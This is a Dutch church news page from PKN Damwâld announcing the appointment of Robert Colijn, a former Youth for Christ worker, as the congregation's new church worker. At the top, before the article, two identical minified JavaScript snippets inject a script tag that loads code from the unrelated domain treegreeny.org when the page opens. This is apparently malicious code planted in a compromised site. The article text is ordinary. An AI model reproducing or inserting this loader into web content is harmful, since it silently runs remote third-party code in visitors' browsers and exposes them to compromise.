;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Robert Colijn nieuwe kerkelijke werker! - PKN Damwâld

Robert Colijn nieuwe kerkelijke werker!

Gepubliceerd op: maandag 19 maart 2018

Afgelopen woensdag na de Biddienst voor gewas en arbeid was er voor de Gereformeerde gemeente een korte gemeenteavond waarin de nieuwe kerkelijke werker werd voorgesteld. De sollicitatiecommissie is de afgelopen weken druk bezig geweest met het voeren van sollicitatiegesprekken met vele mogelijke kandidaten voor de vacature. Leverde de vorige ronde nog geen resultaat op, nu leverde de sollicitatieronde wel succes op: Robert Colijn was de geschikte kandidaat!

Robert heeft 20 jaar gewerkt voor Youth for Christ waar hij onder andere gemeentes trainde en ondersteunde waar ze hulp nodig hadden. Vooral in het jongerenwerk heeft hij veel ervaring en heeft hij ook veel zin om onze gemeente te ondersteunen en actief om te gaan met de jongeren en jongvolwassenen.

De sollicitatiecommissie was erg enthousiast en heeft dit kunnen overbrengen op de gemeente. Na een aantal vragen was uiteindelijk iedereen enthousiast en was er een unanieme stemming  om Robert in dienst te nemen. Vanaf 1 april zal hij mee gaan kijken zodat hij een goed beeld krijgt van de gemeente en zal er uiteindelijk een plan van aanpak gemaakt worden.

Binnenkort zal Robert zichzelf voorstellen in de gemeente.

Aan het einde van de avond werk de commissie bedankt voor de geweldige inzet en het harde werk wat ze verzet hebben met een prachtig bos bloemen, uitgereikt door de voorzitter Buwalda!

Foto's